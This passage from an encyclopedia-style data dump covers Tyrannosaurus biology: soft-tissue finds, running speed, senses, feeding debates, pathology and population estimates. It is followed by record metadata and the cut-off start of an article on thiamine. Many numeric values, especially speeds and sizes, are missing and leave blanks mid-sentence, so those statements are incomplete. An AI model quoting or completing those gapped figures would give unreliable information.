bone cortices are similar to those of extant birds. In studies reported in Science in April 2007, Asara and colleagues concluded that seven traces of collagen proteins detected in purified T. rex bone most closely match those reported in chickens, followed by frogs and newts. The discovery of proteins from a creature tens of millions of years old, along with similar traces the team found in a mastodon bone at least 160,000 years old, upends the conventional view of fossils and may shift paleontologists' focus from bone hunting to biochemistry. Until these finds, most scientists presumed that fossilization replaced all living tissue with inert minerals. Paleontologist Hans Larsson of McGill University in Montreal, who was not part of the studies, called the finds "a milestone", and suggested that dinosaurs could "enter the field of molecular biology and really slingshot paleontology into the modern world". The presumed soft tissue was called into question by Thomas Kaye of the University of Washington and his co-authors in 2008. They contend that what was really inside the tyrannosaur bone was slimy biofilm created by bacteria that coated the voids once occupied by blood vessels and cells. The researchers found that what previously had been identified as remnants of blood cells, because of the presence of iron, were actually framboids, microscopic mineral spheres bearing iron. They found similar spheres in a variety of other fossils from various periods, including an ammonite. In the ammonite, they found the spheres in a place where the iron they contain could not have had any relationship to the presence of blood. Schweitzer has strongly criticized Kaye's claims and argues that there is no reported evidence that biofilms can produce branching, hollow tubes like those noted in her study. San Antonio, Schweitzer and colleagues published an analysis in 2011 of what parts of the collagen had been recovered, finding that it was the inner parts of the collagen coil that had been preserved, as would have been expected from a long period of protein degradation. Other research challenges the identification of soft tissue as biofilm and confirms finding "branching, vessel-like structures" from within fossilized bone. Speed Scientists have produced a wide range of possible maximum running speeds for Tyrannosaurus: mostly around , but as low as and as high as , though it running this speed is very unlikely. Tyrannosaurus was a bulky and heavy carnivore so it is unlikely to run very fast at all compared to other theropods like Carnotaurus or Giganotosaurus. Researchers have relied on various estimating techniques because, while there are many tracks of large theropods walking, none showed evidence of running. A 2002 report used a mathematical model (validated by applying it to three living animals: alligators, chickens, and humans; and eight more species, including emus and ostriches) to gauge the leg muscle mass needed for fast running (over ). Scientists who think that Tyrannosaurus was able to run point out that hollow bones and other features that would have lightened its body may have kept adult weight to a mere or so, or that other animals like ostriches and horses with long, flexible legs are able to achieve high speeds through slower but longer strides. Proposed top speeds exceeded for Tyrannosaurus, but were deemed infeasible because they would require exceptional leg muscles of approximately 40–86% of total body mass. Even moderately fast speeds would have required large leg muscles. If the muscle mass was less, only for walking or jogging would have been possible. Holtz noted that tyrannosaurids and some closely related groups had significantly longer distal hindlimb components (shin plus foot plus toes) relative to the femur length than most other theropods, and that tyrannosaurids and their close relatives had a tightly interlocked metatarsus (foot bones). The third metatarsal was squeezed between the second and fourth metatarsals to form a single unit called an arctometatarsus. This ankle feature may have helped the animal to run more efficiently. Together, these leg features allowed Tyrannosaurus to transmit locomotory forces from the foot to the lower leg more effectively than in earlier theropods. Additionally, a 2020 study indicates that Tyrannosaurus and other tyrannosaurids were exceptionally efficient walkers. Studies by Dececchi et al., compared the leg proportions, body mass, and the gaits of more than 70 species of theropod dinosaurs including Tyrannosaurus and its relatives. The research team then applied a variety of methods to estimate each dinosaur's top speed when running as well as how much energy each dinosaur expended while moving at more relaxed speeds such as when walking. Among smaller to medium-sized species such as dromaeosaurids, longer legs appear to be an adaptation for faster running, in line with previous results by other researchers. But for theropods weighing over , top running speed is limited by body size, so longer legs instead were found to have correlated with low-energy walking. The results further indicate that smaller theropods evolved long legs as a means to both aid in hunting and escape from larger predators while larger theropods that evolved long legs did so to reduce the energy costs and increase foraging efficiency, as they were freed from the demands of predation pressure due to their role as apex predators. Compared to more basal groups of theropods in the study, tyrannosaurs like Tyrannosaurus itself showed a marked increase in foraging efficiency due to reduced energy expenditures during hunting or scavenging. This in turn likely resulted in tyrannosaurs having a reduced need for hunting forays and requiring less food to sustain themselves as a result. Additionally, the research, in conjunction with studies that show tyrannosaurs were more agile than other large-bodied theropods, indicates they were quite well-adapted to a long-distance stalking approach followed by a quick burst of speed to go for the kill. Analogies can be noted between tyrannosaurids and modern wolves as a result, supported by evidence that at least some tyrannosaurids were hunting in group settings. A study published in 2021 by Pasha van Bijlert et al., calculated the preferred walking speed of Tyrannosaurus, reporting a speed of . While walking, animals reduce their energy expenditure by choosing certain step rhythms at which their body parts resonate. The same would have been true for dinosaurs, but previous studies did not fully account for the impact the tail had on their walking speeds. According to the authors, when a dinosaur walked, its tail would slightly sway up and down with each step as a result of the interspinous ligaments suspending the tail. Like rubber bands, these ligaments stored energy when they are stretched due to the swaying of the tail. Using a 3-D model of Tyrannosaurus specimen Trix, muscles and ligaments were reconstructed to simulate the tail movements. This results in a rhythmic, energy-efficient walking speed for Tyrannosaurus similar to that seen in living animals such as humans, ostriches and giraffes. A 2017 study estimated the top running speed of Tyrannosaurus as , speculating that Tyrannosaurus exhausted its energy reserves long before reaching top speed, resulting in a parabola-like relationship between size and speed. Another 2017 study hypothesized that an adult Tyrannosaurus was incapable of running due to high skeletal loads. Using a calculated weight estimate of 7 tons, the model showed that speeds above would have probably shattered the leg bones of Tyrannosaurus. The finding may mean that running was also not possible for other giant theropod dinosaurs like Giganotosaurus, Mapusaurus and Acrocanthosaurus. However, studies by Eric Snively and colleagues, published in 2019 indicate that Tyrannosaurus and other tyrannosaurids were more maneuverable than allosauroids and other theropods of comparable size due to low rotational inertia compared to their body mass combined with large leg muscles. As a result, it is hypothesized that Tyrannosaurus was capable of making relatively quick turns and could likely pivot its body more quickly when close to its prey, or that while turning, the theropod could "pirouette" on a single planted foot while the alternating leg was held out in a suspended swing during a pursuit. The results of this study potentially could shed light on how agility could have contributed to the success of tyrannosaurid evolution. Possible footprints Rare fossil footprints and trackways found in New Mexico and Wyoming that are assigned to the ichnogenus Tyrannosauripus have been attributed to being made by Tyrannosaurus, based on the stratigraphic age of the rocks they are preserved in. The first specimen, found in 1994 was described by Lockley and Hunt and consists of a single, large footprint. Another pair of ichnofossils, described in 2021, show a large tyrannosaurid rising from a prone position by rising up using its elbows in conjunction with the pads on their feet to stand. These two unique sets of fossils were found in Ludlow, Colorado and Cimarron, New Mexico. Another ichnofossil described in 2018, perhaps belonging to a juvenile Tyrannosaurus or the dubious genus Nanotyrannus was uncovered in the Lance Formation of Wyoming. The trackway itself offers a rare glimpse into the walking speed of tyrannosaurids, and the trackmaker is estimated to have been moving at a speed of , significantly faster than previously assumed for estimations of walking speed in tyrannosaurids. Brain and senses A study conducted by Lawrence Witmer and Ryan Ridgely of Ohio University found that Tyrannosaurus shared the heightened sensory abilities of other coelurosaurs, highlighting relatively rapid and coordinated eye and head movements; an enhanced ability to sense low frequency sounds, which would allow tyrannosaurs to track prey movements from long distances; and an enhanced sense of smell. A study published by Kent Stevens concluded that Tyrannosaurus had keen vision. By applying modified perimetry to facial reconstructions of several dinosaurs including Tyrannosaurus, the study found that Tyrannosaurus had a binocular range of 55 degrees, surpassing that of modern hawks. Stevens estimated that Tyrannosaurus had 13 times the visual acuity of a human and surpassed the visual acuity of an eagle, which is 3.6 times that of a person. Stevens estimated a limiting far point (that is, the distance at which an object can be seen as separate from the horizon) as far as away, which is greater than the that a human can see. Thomas Holtz Jr. would note that high depth perception of Tyrannosaurus may have been due to the prey it had to hunt, noting that it had to hunt ceratopsians such as Triceratops, ankylosaurs such as Ankylosaurus, and hadrosaurs. He would suggest that this made precision more crucial for Tyrannosaurus enabling it to, "get in, get that blow in and take it down." In contrast, Acrocanthosaurus had limited depth perception because they hunted large sauropods, which were relatively rare during the time of Tyrannosaurus. Though no Tyrannosaurus sclerotic ring has been found, Kenneth Carpenter estimated its size based on that of Gorgosaurus. The inferred sclerotic ring for the Stan specimen is ~ in diameter with an internal aperture diameter of ~. Based on eye proportions in living reptiles, this implies a pupil diameter of about , an iris diameter about that of the sclerotic ring, and an eyeball diameter of . Carpenter also estimated an eyeball depth of ~. Based on these calculations, the f-number for Stan's eye is 3–3.8; since diurnal animals have f-numbers of 2.1 or higher, this would indicate that Tyrannosaurus had poor low-light vision and hunted during the day. Tyrannosaurus had very large olfactory bulbs and olfactory nerves relative to their brain size, the organs responsible for a heightened sense of smell. This suggests that the sense of smell was highly developed, and implies that tyrannosaurs could detect carcasses by scent alone across great distances. The sense of smell in tyrannosaurs may have been comparable to modern vultures, which use scent to track carcasses for scavenging. Research on the olfactory bulbs has shown that T. rex had the most highly developed sense of smell of 21 sampled non-avian dinosaur species. Somewhat unusually among theropods, T. rex had a very long cochlea. The length of the cochlea is often related to hearing acuity, or at least the importance of hearing in behavior, implying that hearing was a particularly important sense to tyrannosaurs. Specifically, data suggests that T. rex heard best in the low-frequency range, and that low-frequency sounds were an important part of tyrannosaur behavior. A 2017 study by Thomas Carr and colleagues found that the snout of tyrannosaurids was highly sensitive, based on a high number of small openings in the facial bones of the related Daspletosaurus that contained sensory neurons. The study speculated that tyrannosaurs might have used their sensitive snouts to measure the temperature of their nests and to gently pick up eggs and hatchlings, as seen in modern crocodylians. Another study published in 2021 further suggests that Tyrannosaurus had an acute sense of touch, based on neurovascular canals in the front of its jaws, which it could utilize to better detect and consume prey. The study, published by Kawabe and Hittori et al., suggests that Tyrannosaurus could also accurately sense slight differences in material and movement, allowing it to utilize different feeding strategies on different parts of its prey's carcasses depending on the situation. The sensitive neurovascular canals of Tyrannosaurus also likely were adapted to performing fine movements and behaviors such as nest building, parental care, and other social behavior such as intraspecific communication. The results of this study also align with results made in studying the related tyrannosaurid Daspletosaurus horneri and the allosauroid Neovenator, which have similar neurovascular adaptations, suggesting that the faces of theropods were highly sensitive to pressure and touch. However, a more recent study reviewing the evolution of the trigeminal canals among sauropsids notes that a much denser network of neurovascular canals in the snout and lower jaw is more commonly encountered in aquatic or semiaquatic taxa (e.g., Spinosaurus, Halszkaraptor, Plesiosaurus), and taxa that developed a rhamphotheca (e.g., Caenagnathasia), while the network of canals in Tyrannosaurus appears simpler, though still more derived than in most ornithischians, and overall terrestrial taxa such as tyrannosaurids and Neovenator may have had average facial sensitivity for non-edentulous terrestrial theropods, although further research is needed. The neurovascular canals in Tyrannosaurus may instead have supported soft tissue structures for thermoregulation or social signaling, the latter of which could be confirmed by the fact that the neurovascular network of canals may have changed during ontogeny. A study by Grant R. Hurlburt, Ryan C. Ridgely and Lawrence Witmer obtained estimates for Encephalization Quotients (EQs), based on reptiles and birds, as well as estimates for the ratio of cerebrum to brain mass. The study concluded that Tyrannosaurus had the relatively largest brain of all adult non-avian dinosaurs with the exception of certain small maniraptoriforms (Bambiraptor, Troodon and Ornithomimus). The study found that Tyrannosaurus'''s relative brain size was still within the range of modern reptiles, being at most 2 standard deviations above the mean of non-avian reptile EQs. The estimates for the ratio of cerebrum mass to brain mass would range from 47.5 to 49.53 percent. According to the study, this is more than the lowest estimates for extant birds (44.6 percent), but still close to the typical ratios of the smallest sexually mature alligators which range from 45.9–47.9 percent. Other studies, such as those by Steve Brusatte, indicate the encephalization quotient of Tyrannosaurus was similar in range (2.0–2.4) to a chimpanzee (2.2–2.5), though this may be debatable as reptilian and mammalian encephalization quotients are not equivalent. Social behavior Philip J. Currie suggested that Tyrannosaurus may have been pack hunters, comparing T. rex to related species Tarbosaurus bataar and Albertosaurus sarcophagus, citing fossil evidence that may indicate gregarious (describing animals that travel in herds or packs) behavior. A find in South Dakota where three T. rex skeletons were in close proximity may suggest the formation of a pack. Cooperative pack hunting may have been an effective strategy for subduing prey with advanced anti-predator adaptations which pose potential lethality such as Triceratops and Ankylosaurus. Currie's pack-hunting T. rex hypothesis has been criticized for not having been peer-reviewed, but rather was discussed in a television interview and book called Dino Gangs. The Currie theory for pack hunting by T. rex is based mainly by analogy to a different species, Tarbosaurus bataar. Evidence of gregariousness in T. bataar itself has not been peer-reviewed, and to Currie's own admission, can only be interpreted with reference to evidence in other closely related species. According to Currie gregariousness in Albertosaurus sarcophagus is supported by the discovery of 26 individuals with varied ages in the Dry Island bonebed. He ruled out the possibility of a predator trap due to the similar preservation state of individuals and the near absence of herbivores. (not printed until 2000) Additional support of tyrannosaurid gregariousness can be found in fossilized trackways from the Upper Cretaceous Wapiti Formation of northeastern British Columbia, Canada, left by three tyrannosaurids traveling in the same direction. According to scientists assessing the Dino Gangs program, the evidence for pack hunting in Tarbosaurus and Albertosaurus is weak and based on group skeletal remains for which alternate explanations may apply (such as drought or a flood forcing dinosaurs to die together in one place). Others researchers have speculated that instead of large theropod social groups, some of these finds represent behavior more akin to Komodo dragon-like mobbing of carcasses, even going as far as to say true pack-hunting behavior may not exist in any non-avian dinosaurs due to its rarity in modern predators. Evidence of intraspecific attack was found by Joseph Peterson and his colleagues in the juvenile Tyrannosaurus nicknamed Jane. Peterson and his team found that Jane's skull showed healed puncture wounds on the upper jaw and snout which they believe came from another juvenile Tyrannosaurus. Subsequent CT scans of Jane's skull would further confirm the team's hypothesis, showing that the puncture wounds came from a traumatic injury and that there was subsequent healing. The team would also state that Jane's injuries were structurally different from the parasite-induced lesions found in Sue and that Jane's injuries were on its face whereas the parasite that infected Sue caused lesions to the lower jaw. Pathologies of other Tyrannosaurus specimens have been suggested as evidence of conspecific attack, including "Wyrex" with a hole penetrating its jugual and severe trauma on its tail that shows signs of bone remodeling (not regrowth). Feeding strategies Most paleontologists accept that Tyrannosaurus was both an active predator and a scavenger like most large carnivores. By far the largest carnivore in its environment, T. rex was most likely an apex predator, preying upon hadrosaurs, armored herbivores like ceratopsians and ankylosaurs, and possibly sauropods. Enamel δ44/42Ca values also suggest the possibility that T. rex occasionally fed on carcasses of marine reptiles and fish washed up on the shores of the Western Interior Seaway. A study in 2012 by Karl Bates and Peter Falkingham found that Tyrannosaurus had the most powerful bite of any terrestrial animal that has ever lived, finding an adult Tyrannosaurus could have exerted 35,000 to 57,000 N (7,868 to 12,814 lbf) of force in the back teeth. Even higher estimates were made by Mason B. Meers in 2003. This allowed it to crush bones during repetitive biting and fully consume the carcasses of large dinosaurs. Stephan Lautenschlager and colleagues calculated that Tyrannosaurus was capable of a maximum jaw gape of around 80 degrees, a necessary adaptation for a wide range of jaw angles to power the creature's strong bite. A debate exists, however, about whether Tyrannosaurus was primarily a predator or a pure scavenger. The debate originated in a 1917 study by Lambe which argued that large theropods were pure scavengers because Gorgosaurus teeth showed hardly any wear. This argument disregarded the fact that theropods replaced their teeth quite rapidly. Ever since the first discovery of Tyrannosaurus most scientists have speculated that it was a predator; like modern large predators it would readily scavenge or steal another predator's kill if it had the opportunity. Paleontologist Jack Horner has been a major proponent of the view that Tyrannosaurus was not a predator at all but instead was exclusively a scavenger. He has put forward arguments in the popular literature to support the pure scavenger hypothesis: Tyrannosaur arms are short when compared to other known predators. Horner argues that the arms were too short to make the necessary gripping force to hold on to prey. Other paleontologists such as Thomas Holtz Jr. argued that there are plenty of modern-day predators that do not use their forelimbs to hunt such as wolves, hyenas, and secretary birds as well as other extinct animals thought to be predators that would not have used their forelimbs such as phorusrhacids. Tyrannosaurs had large olfactory bulbs and olfactory nerves (relative to their brain size). These suggest a highly developed sense of smell which could sniff out carcasses over great distances, as modern vultures do. Research on the olfactory bulbs of dinosaurs has shown that Tyrannosaurus had the most highly developed sense of smell of 21 sampled dinosaurs. Tyrannosaur teeth could crush bone, and therefore could extract as much food (bone marrow) as possible from carcass remnants, usually the least nutritious parts. Karen Chin and colleagues have found bone fragments in coprolites (fossilized feces) that they attribute to tyrannosaurs, but point out that a tyrannosaur's teeth were not well adapted to systematically chewing bone like hyenas do to extract marrow. Since at least some of Tyrannosauruss potential prey could move quickly, evidence that it walked instead of ran could indicate that it was a scavenger. On the other hand, recent analyses suggest that Tyrannosaurus, while slower than large modern terrestrial predators, may well have been fast enough to prey on large hadrosaurs and ceratopsians. Other evidence suggests hunting behavior in Tyrannosaurus. The eye sockets of tyrannosaurs are positioned so that the eyes would point forward, giving them binocular vision slightly better than that of modern hawks. It is not obvious why natural selection would have favored this long-term trend if tyrannosaurs had been pure scavengers, which would not have needed the advanced depth perception that stereoscopic vision provides. In modern animals, binocular vision is found mainly in predators. A skeleton of the hadrosaurid Edmontosaurus annectens has been described from Montana with healed tyrannosaur-inflicted damage on its tail vertebrae. The fact that the damage seems to have healed suggests that the Edmontosaurus survived a tyrannosaur's attack on a living target, i.e. the tyrannosaur had attempted active predation. Despite the consensus that the tail bites were caused by Tyrannosaurus, there has been some evidence to show that they might have been created by other factors. For example, a 2014 study suggested that the tail injuries might have been due to Edmontosaurus individuals stepping on each other, while another study in 2020 backs up the hypothesis that biomechanical stress is the cause for the tail injuries. There is also evidence for an aggressive interaction between a Triceratops and a Tyrannosaurus in the form of partially healed tyrannosaur tooth marks on a Triceratops brow horn and squamosal (a bone of the neck frill); the bitten horn is also broken, with new bone growth after the break. It is not known what the exact nature of the interaction was, though: either animal could have been the aggressor. Since the Triceratops wounds healed, it is most likely that the Triceratops survived the encounter and managed to overcome the Tyrannosaurus. In a battle against a bull Triceratops, the Triceratops would likely defend itself by inflicting fatal wounds to the Tyrannosaurus using its sharp horns. Studies of Sue found a broken and healed fibula and tail vertebrae, scarred facial bones and a tooth from another Tyrannosaurus embedded in a neck vertebra, providing evidence for aggressive behavior. Studies on hadrosaur vertebrae from the Hell Creek Formation that were punctured by the teeth of what appears to be a late-stage juvenile Tyrannosaurus indicate that despite lacking the bone-crushing adaptations of the adults, young individuals were still capable of using the same bone-puncturing feeding technique as their adult counterparts.Tyrannosaurus may have had infectious saliva used to kill its prey, as proposed by William Abler in 1992. Abler observed that the (tiny protuberances) on the cutting edges of the teeth are closely spaced, enclosing little chambers. These chambers might have trapped pieces of carcass with bacteria, giving Tyrannosaurus a deadly, infectious bite much like the Komodo dragon was thought to have. Jack Horner and Don Lessem, in a 1993 popular book, questioned Abler's hypothesis, arguing that Tyrannosauruss tooth serrations as more like cubes in shape than the serrations on a Komodo monitor's teeth, which are rounded.Tyrannosaurus, and most other theropods, probably primarily processed carcasses with lateral shakes of the head, like crocodilians. The head was not as maneuverable as the skulls of allosauroids, due to flat joints of the neck vertebrae. Cannibalism Evidence also strongly suggests that tyrannosaurs were at least occasionally cannibalistic. Tyrannosaurus itself has strong evidence pointing towards it having been cannibalistic in at least a scavenging capacity based on tooth marks on the foot bones, humerus, and metatarsals of one specimen. Fossils from the Fruitland Formation, Kirtland Formation (both Campanian in age) and the Maastrichtian aged Ojo Alamo Formation suggest that cannibalism was present in various tyrannosaurid genera of the San Juan Basin. The evidence gathered from the specimens suggests opportunistic feeding behavior in tyrannosaurids that cannibalized members of their own species. A study from Currie, Horner, Erickson and Longrich in 2010 has been put forward as evidence of cannibalism in the genus Tyrannosaurus. They studied some Tyrannosaurus specimens with tooth marks in the bones, attributable to the same genus. The tooth marks were identified in the humerus, foot bones and metatarsals, and this was seen as evidence for opportunistic scavenging, rather than wounds caused by intraspecific combat. In a fight, they proposed it would be difficult to reach down to bite in the feet of a rival, making it more likely that the bitemarks were made in a carcass. As the bitemarks were made in body parts with relatively scantly amounts of flesh, it is suggested that the Tyrannosaurus was feeding on a cadaver in which the more fleshy parts already had been consumed. They were also open to the possibility that other tyrannosaurids practiced cannibalism. Parenting While there is no direct evidence of Tyrannosaurus raising their young (the rarity of juvenile and nest Tyrannosaur fossils has left researchers guessing), it has been suggested by some that like its closest living relatives, modern archosaurs (birds and crocodiles) Tyrannosaurus may have protected and fed its young. Crocodilians and birds are often suggested by some paleontologists to be modern analogues for dinosaur parenting. Direct evidence of parental behavior exists in other dinosaurs such as Maiasaura peeblesorum, the first dinosaur to have been discovered to raise its young, as well as more closely related Oviraptorids, the latter suggesting parental behavior in theropods. Pathology In 2001, Bruce Rothschild and others published a study examining evidence for stress fractures and tendon avulsions in theropod dinosaurs and the implications for their behavior. Since stress fractures are caused by repeated trauma rather than singular events they are more likely to be caused by regular behavior than other types of injuries. Of the 81 Tyrannosaurus foot bones examined in the study, one was found to have a stress fracture, while none of the 10 hand bones were found to have stress fractures. The researchers found tendon avulsions only among Tyrannosaurus and Allosaurus. An avulsion injury left a divot on the humerus of Sue the T. rex, apparently located at the origin of the deltoid or teres major muscles. The presence of avulsion injuries being limited to the forelimb and shoulder in both Tyrannosaurus and Allosaurus suggests that theropods may have had a musculature more complex than and functionally different from those of birds. The researchers concluded that Sue's tendon avulsion was probably obtained from struggling prey. The presence of stress fractures and tendon avulsions, in general, provides evidence for a "very active" predation-based diet rather than obligate scavenging. A 2009 study showed that smooth-edged holes in the skulls of several specimens might have been caused by Trichomonas-like parasites that commonly infect birds. According to the study, seriously infected individuals, including "Sue" and MOR 980 ("Peck's Rex"), might therefore have died from starvation after feeding became increasingly difficult. Previously, these holes had been explained by the bacterious bone infection Actinomycosis or by intraspecific attacks. A subsequent study found that while trichomoniasis has many attributes of the model proposed (osteolytic, intra oral) several features make the assumption that it was the cause of death less supportable by evidence. For example, the observed sharp margins with little reactive bone shown by the radiographs of Trichomonas-infected birds are dissimilar to the reactive bone seen in the affected T. rex specimens. Also, trichomoniasis can be very rapidly fatal in birds (14 days or less) albeit in its milder form, and this suggests that if a Trichomonas-like protozoan is the culprit, trichomoniasis was less acute in its non-avian dinosaur form during the Late Cretaceous. Finally, the relative size of this type of lesions is much larger in small bird throats, and may not have been enough to choke a T. rex. A more recent study examining the pathologies concluded that the osseous alteration observed most closely resembles those around healing human cranial trepanations and healing fractures in the Triassic reptile Stagonolepis, in the absence of infection. The possible cause may instead have been intraspecific combat. One study of Tyrannosaurus specimens with tooth marks in the bones attributable to the same genus was presented as evidence of cannibalism. Tooth marks in the humerus, foot bones and metatarsals, may indicate opportunistic scavenging, rather than wounds caused by combat with another T. rex. Other tyrannosaurids may also have practiced cannibalism. PaleoecologyTyrannosaurus lived during what is referred to as the Lancian faunal stage (Maastrichtian age) at the end of the Late Cretaceous. Tyrannosaurus ranged from Canada in the north to at least New Mexico in the south of Laramidia. During this time Triceratops was the major herbivore in the northern portion of its range, while the titanosaurian sauropod Alamosaurus "dominated" its southern range. Tyrannosaurus remains have been discovered in different ecosystems, including inland and coastal subtropical, and semi-arid plains. Several notable Tyrannosaurus remains have been found in the Hell Creek Formation. During the Maastrichtian this area was subtropical, with a warm and humid climate. The flora consisted mostly of angiosperms, but also included trees like dawn redwood (Metasequoia) and Araucaria. Tyrannosaurus shared this ecosystem with ceratopsians Leptoceratops, Torosaurus, and Triceratops, the hadrosaurid Edmontosaurus annectens, the parksosaurid Thescelosaurus, the ankylosaurs Ankylosaurus and Denversaurus, the pachycephalosaurs Pachycephalosaurus and Sphaerotholus, and the theropods Ornithomimus, Struthiomimus, Acheroraptor, Dakotaraptor, Pectinodon and Anzu. Another formation with Tyrannosaurus remains is the Lance Formation of Wyoming. This has been interpreted as a bayou environment similar to today's Gulf Coast. The fauna was very similar to Hell Creek, but with Struthiomimus replacing its relative Ornithomimus. The small ceratopsian Leptoceratops also lived in the area. In its southern range, specifically based on remains discovered from the North Horn Formation of Utah, Tyrannosaurus rex lived alongside the titanosaur Alamosaurus, the ceratopsid Torosaurus and the indeterminate troodontids and hadrosaurids. Tyrannosaurus mcraeensis from the McRae Group of New Mexico coexisted with the ceratopsid Sierraceratops and possibly the titanosaur Alamosaurus. Potential remains identified as cf. Tyrannosaurus have also been discovered from the Javelina Formation of Texas, where the remains of the titanosaur Alamosaurus, the ceratopsid Bravoceratops, the pterosaurs Quetzalcoatlus and Wellnhopterus, and possible species of troodontids and hadrosaurids are found. Its southern range is thought to have been dominated by semi-arid inland plains, following the probable retreat of the Western Interior Seaway as global sea levels fell.Tyrannosaurus may have also inhabited Mexico's Lomas Coloradas Formation in Sonora. Though skeletal evidence is lacking, six shed and broken teeth from the fossil bed have been thoroughly compared with other theropod genera and appear to be identical to those of Tyrannosaurus. If true, the evidence indicates the range of Tyrannosaurus was possibly more extensive than previously believed. It is possible that tyrannosaurs were originally Asian species, migrating to North America before the end of the Cretaceous period. Population estimates According to studies published in 2021 by Charles Marshall et al., the total population of adult Tyrannosaurus at any given time was perhaps 20,000 individuals, with computer estimations also suggesting a total population no lower than 1,300 and no higher than 328,000. The authors themselves suggest that the estimate of 20,000 individuals is probably lower than what should be expected, especially when factoring in that disease pandemics could easily wipe out such a small population. Over the span of the genus' existence, it is estimated that there were about 127,000 generations and that this added up to a total of roughly 2.5 billion animals until their extinction. In the same paper, it is suggested that in a population of Tyrannosaurus adults numbering 20,000, the number of individuals living in an area the size of California could be as high as 3,800 animals, while an area the size of Washington D.C. could support a population of only two adult Tyrannosaurus. The study does not take into account the number of juvenile animals in the genus present in this population estimate due to their occupation of a different niche than the adults, and thus it is likely the total population was much higher when accounting for this factor. Simultaneously, studies of living carnivores suggest that some predator populations are higher in density than others of similar weight (such as jaguars and hyenas, which are similar in weight but have vastly differing population densities). Lastly, the study suggests that in most cases, only one in 80 million Tyrannosaurus would become fossilized, while the chances were likely as high as one in every 16,000 of an individual becoming fossilized in areas that had more dense populations. Meiri (2022) questioned the reliability of the estimates, citing uncertainty in metabolic rate, body size, sex and age-specific survival rates, habitat requirements and range size variability as shortcomings Marshall et al. did not take into account. The authors of the original publication replied that while they agree that their reported uncertainties were probably too small, their framework is flexible enough to accommodate uncerainty in physiology, and that their calculations do not depend on short-term changes in population density and geographic range, but rather on their long-term averages. Finally, they remark that they did estimate the range of reasonable survivorship curves and that they did include uncertainty in the time of onset of sexual maturity and in the growth curve by incorporating the uncertainty in the maximum body mass. Cultural significance Since it was first described in 1905, T. rex has become the most widely recognized dinosaur species in popular culture. It is the only dinosaur that is commonly known to the general public by its full scientific name (binomial name) and the scientific abbreviation T. rex has also come into wide usage. Robert T. Bakker notes this in The Dinosaur Heresies and explains that, "a name like T. rex'' is just irresistible to the tongue."
Biology and health sciences
Dinosaurs and prehistoric reptiles
null
30500
https://en.wikipedia.org/wiki/Thiamine
Thiamine
Thiamine, also known as thiamin and vitamin B1, is a vitamin – an essential micronutrient for humans and animals. It is found in food and commercially synthesized to be a dietary supplement or medication. Phosphorylated forms of thiamine are required for some metabolic reactions, including the breakdown of glucose and amino acids. Food sources of thiamine include whole grains, legumes, and some meats and fish. Grain processing removes much of the vitamin content, so in many countries cereals and flours are enriched with thiamine. Supplements and medications are available to treat and prevent thiamine deficiency and the disorders that result from it such as beriberi and Wernicke encephalopathy. They are also used to treat maple syrup urine disease and Leigh syndrome. Supplements and medications are typically taken by mouth, but may also be given by intravenous or intramuscular injection. Thiamine supplements are generally well tolerated. Allergic reactions, including anaphylaxis, may occur when repeated doses are given by injection. Thiamine is on the World Health Organization's List of Essential Medicines. It is available as a generic medication, and in some countries as a non-prescription dietary supplement. In 2022, it was the 288th most commonly prescribed medication in the United States, with more than 500,000 prescriptions. Definition Thiamine is one of the B vitamins and is also known as vitamin B1. It is a cation that is usually supplied as a chloride salt. It is soluble in water, methanol and glycerol, but practically insoluble in less polar organic solvents. In the body, thiamine can form derivatives; the most well-characterized of which is thiamine pyrophosphate (TPP), a coenzyme in the catabolism of sugars and amino acids. The chemical structure consists of an aminopyrimidine and a thiazolium ring linked by a methylene bridge. The thiazole is substituted with methyl and hydroxyethyl side chains. Thiamine is stable at acidic pH, but it is unstable in alkaline solutions and from exposure to heat. It reacts strongly in Maillard-type reactions. Oxidation yields the fluorescent derivative thiochrome, which can be used to determine the amount of the vitamin present in biological samples. Deficiency Well-known disorders caused by thiamine deficiency include beriberi, Wernicke–Korsakoff syndrome, optic neuropathy, Leigh's disease, African seasonal ataxia (or Nigerian seasonal ataxia), and central pontine myelinolysis. Symptoms include malaise, weight loss, irritability and confusion. In Western countries, chronic alcoholism is a risk factor for deficiency. Also at risk are older adults, persons with HIV/AIDS or diabetes, and those who have had bariatric surgery. Varying degrees of thiamine insufficiency have been associated with the long-term use of diuretics. Biological functions Five natural thiamine phosphate derivatives are known: thiamine monophosphate (ThMP), thiamine pyrophosphate (TPP), thiamine triphosphate (ThTP), adenosine thiamine diphosphate (AThDP) and adenosine thiamine triphosphate (AThTP). They are involved in many cellular processes. The best-characterized form is TPP, a coenzyme in the catabolism of sugars and amino acids. While its role is well-known, the non-coenzyme action of thiamine and derivatives may be realized through binding to proteins which do not use that mechanism. No physiological role is known for the monophosphate except as an intermediate in cellular conversion of thiamine to the di- and triphosphates. Thiamine pyrophosphate Thiamine pyrophosphate (TPP), also called thiamine diphosphate (ThDP), participates as a coenzyme in metabolic reactions, including those in which polarity inversion takes place. Its synthesis is catalyzed by the enzyme thiamine diphosphokinase according to the reaction thiamine + ATP → TPP + AMP (EC 2.7.6.2). However, recent findings reveal that uridine 5′-triphosphate (UTP), rather than ATP, is the preferred substrate for TPP synthesis in cells, with TPK1 showing a ~10-fold higher affinity for UTP. TPP is a coenzyme for several enzymes that catalyze the transfer of two-carbon units and in particular the dehydrogenation (decarboxylation and subsequent conjugation with coenzyme A) of 2-oxoacids (alpha-keto acids). The mechanism of action of TPP as a coenzyme relies on its ability to form an ylide. Examples include: Present in most species pyruvate dehydrogenase and 2-oxoglutarate dehydrogenase (also called α-ketoglutarate dehydrogenase) branched-chain α-keto acid dehydrogenase 2-hydroxyphytanoyl-CoA lyase transketolase Present in some species: pyruvate decarboxylase (in yeast) several additional bacterial enzymes The enzymes transketolase, pyruvate dehydrogenase (PDH), and 2-oxoglutarate dehydrogenase (OGDH) are important in carbohydrate metabolism. PDH links glycolysis to the citric acid cycle. OGDH catalyzes the overall conversion of 2-oxoglutarate (alpha-ketoglutarate) to succinyl-CoA and CO2 during the citric acid cycle. The reaction catalyzed by OGDH is a rate-limiting step in the citric acid cycle. The cytosolic enzyme transketolase is central to the pentose phosphate pathway, a major route for the biosynthesis of the pentose sugars deoxyribose and ribose. The mitochondrial PDH and OGDH are part of biochemical pathways that result in the generation of adenosine triphosphate (ATP), which is the main energy transfer molecule for the cell. In the nervous system, PDH is also involved in the synthesis of myelin and the neurotransmitter acetylcholine. Thiamine triphosphate ThTP is implicated in chloride channel activation in the neurons of mammals and other animals, although its role is not well understood. ThTP has been found in bacteria, fungi and plants, suggesting that it has other cellular roles. In Escherichia coli, it is implicated in the response to amino acid starvation. Adenosine derivatives AThDP exists in small amounts in 